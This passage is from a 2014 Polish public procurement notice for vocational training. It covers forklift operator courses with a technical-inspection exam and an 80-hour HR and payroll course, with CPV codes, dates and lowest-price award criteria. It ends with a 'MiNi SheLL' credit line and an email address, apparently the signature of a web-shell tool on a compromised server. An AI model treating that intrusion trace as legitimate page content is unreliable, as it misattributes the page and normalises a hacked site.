c) podnośnikowe - podnośnikowy boczny wysokiego składowania
d) ciągnikowe
e) specjalne
f) wózek specjalistyczny ze zmiennym wysięgiem

Program szkolenia dla kierowców wózków jezdniowych z napędem silnikowym zgodny z nr PP-13/TT/VI/29-W/99 zatwierdzony przez Ośrodek Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach. Zamawiający wymaga aby bezpośrednio po zajęciach z wózków jezdniowych  został przeprowadzony egzamin na wózki typu II WJO przed komisją Urzędu Dozoru Technicznego oraz zostały wydane dla kursantów Zaświadczenia kwalifikacyjne do obsługi urządzeń transportu bliskiego. 
Koszt egzaminu oraz koszt badań lekarskich zostanie ujęty w koszcie szkolenia. 
Wykonawca zapewnia sprzęt oraz materiały dydaktyczne: Zamawiający wymaga co najmniej 5 sztuk kas fiskalnych do Modułu I..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> księgowość, kadry, płace i archiwum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagana minimalna ilość godzin: 80 godzin
Kurs skierowany jest do osób, które planują podjąć pracę w działach kadr i wynagrodzeń oraz do osób, które posiadają niewielkie doświadczenie w tej dziedzinie i chcą pogłębić lub uaktualnić swoją wiedzę  z zakresu:
Kadry - 24 h; Płace - 24 h;Zasiłki - 16 h; Ubezpieczenia społeczne -8 h; PŁATNIK - zajęcia komputerowe -8 h.

Wykonawca powinien zagwarantować taką ilość komputerów jednocześnie, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com